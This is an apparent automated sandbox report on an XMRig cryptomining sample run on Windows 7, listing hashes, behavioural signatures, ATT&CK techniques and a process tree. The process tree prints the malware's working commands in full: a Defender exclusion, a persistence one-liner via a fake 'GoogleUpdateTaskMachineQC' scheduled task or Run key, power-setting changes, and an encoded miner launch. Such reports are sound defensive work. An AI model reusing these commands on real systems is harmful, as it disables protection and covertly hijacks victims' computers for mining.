xmrig | 132619c16e456a088e6dcc4925d1fe582fe621a3489dffb91aa94017c5c7d2cc

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
20/07/2023, 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
Size

2.3MB
MD5

95ca970b99b80e1637f0058223ef20d7
SHA1

15fffa0937e2fc4a5b1adfea795f0e111327e86e
SHA256

5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
SHA512

e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
SSDEEP

49152:2PqtTwUpl5X+V/Dwo88/YNO8cc6FCq87zgX69Im0E8O+GAH:NJDmLwo8AAxFg87zq698Vj

Score

10^/10

xmrig miner upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 1832 created 1240	1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe	21
PID 1832 created 1240	1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe	21
PID 1832 created 1240	1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe	21
PID 1832 created 1240	1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe	21
PID 2800 created 1240	2800	updater.exe	21
PID 2800 created 1240	2800	updater.exe	21
PID 2800 created 1240	2800	updater.exe	21
PID 2800 created 1240	2800	updater.exe	21
PID 2800 created 1240	2800	updater.exe	21
PID 1968 created 1240	1968	conhost.exe	21
PID 2800 created 1240	2800	updater.exe	21

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral1/memory/2264-122-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-125-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-126-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-129-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-133-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-135-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-137-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-139-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-141-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-143-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-145-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-147-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
2800	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
2680	taskeng.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2264-122-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-125-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-126-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-129-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-133-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-135-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-137-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-139-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-141-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-143-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-145-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-147-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
2800	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2800 set thread context of 1968	2800	updater.exe	55
PID 2800 set thread context of 2264	2800	updater.exe	64

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2960	schtasks.exe
1732	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2884	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3061207facbad901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
2544	powershell.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
2436	powershell.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
1832	5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
2840	powershell.exe
2800	updater.exe
2800	updater.exe
520	powershell.exe
2800	updater.exe
2800	updater.exe
2800	updater.exe
2800	updater.exe
1644	powershell.exe
2800	updater.exe
2800	updater.exe
2800	updater.exe
2800	updater.exe
1968	conhost.exe
1968	conhost.exe
2800	updater.exe
2800	updater.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe
2264	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeShutdownPrivilege	2420	powercfg.exe
Token: SeShutdownPrivilege	2824	powercfg.exe
Token: SeShutdownPrivilege	2952	powercfg.exe
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeShutdownPrivilege	2804	powercfg.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	520	powershell.exe
Token: SeShutdownPrivilege	3048	powercfg.exe
Token: SeShutdownPrivilege	2984	powercfg.exe
Token: SeShutdownPrivilege	2864	powercfg.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeShutdownPrivilege	2904	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	2884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2884	WMIC.exe
Token: SeSecurityPrivilege	2884	WMIC.exe
Token: SeTakeOwnershipPrivilege	2884	WMIC.exe
Token: SeLoadDriverPrivilege	2884	WMIC.exe
Token: SeSystemtimePrivilege	2884	WMIC.exe
Token: SeBackupPrivilege	2884	WMIC.exe
Token: SeRestorePrivilege	2884	WMIC.exe
Token: SeShutdownPrivilege	2884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2884	WMIC.exe
Token: SeUndockPrivilege	2884	WMIC.exe
Token: SeManageVolumePrivilege	2884	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2884	WMIC.exe
Token: SeSecurityPrivilege	2884	WMIC.exe
Token: SeTakeOwnershipPrivilege	2884	WMIC.exe
Token: SeLoadDriverPrivilege	2884	WMIC.exe
Token: SeSystemtimePrivilege	2884	WMIC.exe
Token: SeBackupPrivilege	2884	WMIC.exe
Token: SeRestorePrivilege	2884	WMIC.exe
Token: SeShutdownPrivilege	2884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2884	WMIC.exe
Token: SeUndockPrivilege	2884	WMIC.exe
Token: SeManageVolumePrivilege	2884	WMIC.exe
Token: SeLockMemoryPrivilege	2264	conhost.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 2860 wrote to memory of 2420	2860	cmd.exe	34
PID 2860 wrote to memory of 2420	2860	cmd.exe	34
PID 2860 wrote to memory of 2420	2860	cmd.exe	34
PID 2860 wrote to memory of 2824	2860	cmd.exe	35
PID 2860 wrote to memory of 2824	2860	cmd.exe	35
PID 2860 wrote to memory of 2824	2860	cmd.exe	35
PID 2860 wrote to memory of 2952	2860	cmd.exe	36
PID 2860 wrote to memory of 2952	2860	cmd.exe	36
PID 2860 wrote to memory of 2952	2860	cmd.exe	36
PID 2860 wrote to memory of 2804	2860	cmd.exe	37
PID 2860 wrote to memory of 2804	2860	cmd.exe	37
PID 2860 wrote to memory of 2804	2860	cmd.exe	37
PID 2436 wrote to memory of 2960	2436	powershell.exe	38
PID 2436 wrote to memory of 2960	2436	powershell.exe	38
PID 2436 wrote to memory of 2960	2436	powershell.exe	38
PID 2840 wrote to memory of 2004	2840	powershell.exe	41
PID 2840 wrote to memory of 2004	2840	powershell.exe	41
PID 2840 wrote to memory of 2004	2840	powershell.exe	41
PID 2680 wrote to memory of 2800	2680	taskeng.exe	43
PID 2680 wrote to memory of 2800	2680	taskeng.exe	43
PID 2680 wrote to memory of 2800	2680	taskeng.exe	43
PID 1472 wrote to memory of 3048	1472	cmd.exe	50
PID 1472 wrote to memory of 3048	1472	cmd.exe	50
PID 1472 wrote to memory of 3048	1472	cmd.exe	50
PID 1472 wrote to memory of 2984	1472	cmd.exe	51
PID 1472 wrote to memory of 2984	1472	cmd.exe	51
PID 1472 wrote to memory of 2984	1472	cmd.exe	51
PID 1472 wrote to memory of 2864	1472	cmd.exe	52
PID 1472 wrote to memory of 2864	1472	cmd.exe	52
PID 1472 wrote to memory of 2864	1472	cmd.exe	52
PID 1644 wrote to memory of 1732	1644	powershell.exe	53
PID 1644 wrote to memory of 1732	1644	powershell.exe	53
PID 1644 wrote to memory of 1732	1644	powershell.exe	53
PID 1472 wrote to memory of 2904	1472	cmd.exe	54
PID 1472 wrote to memory of 2904	1472	cmd.exe	54
PID 1472 wrote to memory of 2904	1472	cmd.exe	54
PID 2800 wrote to memory of 1968	2800	updater.exe	55
PID 1976 wrote to memory of 2884	1976	cmd.exe	60
PID 1976 wrote to memory of 2884	1976	cmd.exe	60
PID 1976 wrote to memory of 2884	1976	cmd.exe	60
PID 2800 wrote to memory of 2264	2800	updater.exe	64

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1240
- C:\Users\Admin\AppData\Local\Temp\5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
  "C:\Users\Admin\AppData\Local\Temp\5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wtqefibev#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2960
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2420
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2824
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2952
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eivudnbn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:520
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wtqefibev#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1644
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1732
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe mrldfcnkjtpom
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1968
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1788
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe xserwfqvlxzoakxb 6E3sjfZq2rJQaxvLPmXgsK/+j3+8kDQ50juBnXtgaNA5bXl8IhyJSVhC36oZ+LR7lRivqD2W2bSOssOtPqg4HmIYu1ls2lpjcAH6qJ/SIKeKkM1SHWo+dKhkJtHeuU+yQmsnWIoUmtoW7e6Z4Dole3MZ9tZh9LFCmjgpfo3IgNPGB5P/yRBaU6wxNgZR5ApqnjpoSKIyxK0GafxBvWEzKAEE/zININMm9jsZx0QqFdVKqikZI/OJ3mwRUN8sAZywSMB0/qZvqzrUFg0MfWX3nC4UjaI8biSgyb8RqGEmL5ekF1REezN23lpYPUSUJ31ougdPmt+b+rrAhnaodpEH8eCfc/WDYSDjK5avdVO5fHKag5a2RKDTnDhBFRPD7F68F8M8XkzAY4OTONT0I9lTyUhnVIqeRPED30OBUm+mK1PQs5L1bor5jPTRjTi1cXuqE2dHZxMDzbglHSZmkVVFrmWrzDT4ZpnFwgMjjKERI4A=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2264

C:\Windows\system32\taskeng.exe
taskeng.exe {3072B7AE-9B04-46B6-957D-E308274CF491} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
2.3MB

MD5
95ca970b99b80e1637f0058223ef20d7

SHA1
15fffa0937e2fc4a5b1adfea795f0e111327e86e

SHA256
5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5

SHA512
e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
2.3MB

MD5
95ca970b99b80e1637f0058223ef20d7

SHA1
15fffa0937e2fc4a5b1adfea795f0e111327e86e

SHA256
5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5

SHA512
e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3711935800dead2cd6c78c03f9068f85

SHA1
6a1b8e5def76ca7a05be306680363c1610c798ec

SHA256
9ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a

SHA512
c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3711935800dead2cd6c78c03f9068f85

SHA1
6a1b8e5def76ca7a05be306680363c1610c798ec

SHA256
9ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a

SHA512
c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3W1PPQC4CHJX1XXNYBI.temp

Filesize
7KB

MD5
3711935800dead2cd6c78c03f9068f85

SHA1
6a1b8e5def76ca7a05be306680363c1610c798ec

SHA256
9ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a

SHA512
c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
2.3MB

MD5
95ca970b99b80e1637f0058223ef20d7

SHA1
15fffa0937e2fc4a5b1adfea795f0e111327e86e

SHA256
5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5

SHA512
e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8

Download Submit
memory/520-101-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/520-106-0x000007FEF4730000-0x000007FEF50CD000-memory.dmp

Filesize
9.6MB

Download
memory/520-100-0x000007FEF4730000-0x000007FEF50CD000-memory.dmp

Filesize
9.6MB

Download
memory/520-102-0x000007FEF4730000-0x000007FEF50CD000-memory.dmp

Filesize
9.6MB

Download
memory/520-104-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/1644-113-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

Filesize
9.6MB

Download
memory/1644-107-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

Filesize
9.6MB

Download
memory/1644-108-0x0000000001150000-0x00000000011D0000-memory.dmp

Filesize
512KB

Download
memory/1644-109-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

Filesize
9.6MB

Download
memory/1644-110-0x0000000001150000-0x00000000011D0000-memory.dmp

Filesize
512KB

Download
memory/1644-111-0x0000000001150000-0x00000000011D0000-memory.dmp

Filesize
512KB

Download
memory/1644-112-0x0000000001150000-0x00000000011D0000-memory.dmp

Filesize
512KB

Download
memory/1832-81-0x0000000140000000-0x0000000140250000-memory.dmp

Filesize
2.3MB

Download
memory/1832-71-0x0000000140000000-0x0000000140250000-memory.dmp

Filesize
2.3MB

Download
memory/1832-54-0x0000000140000000-0x0000000140250000-memory.dmp

Filesize
2.3MB

Download
memory/1968-124-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1968-128-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/2264-123-0x0000000000880000-0x00000000008A0000-memory.dmp

Filesize
128KB

Download
memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
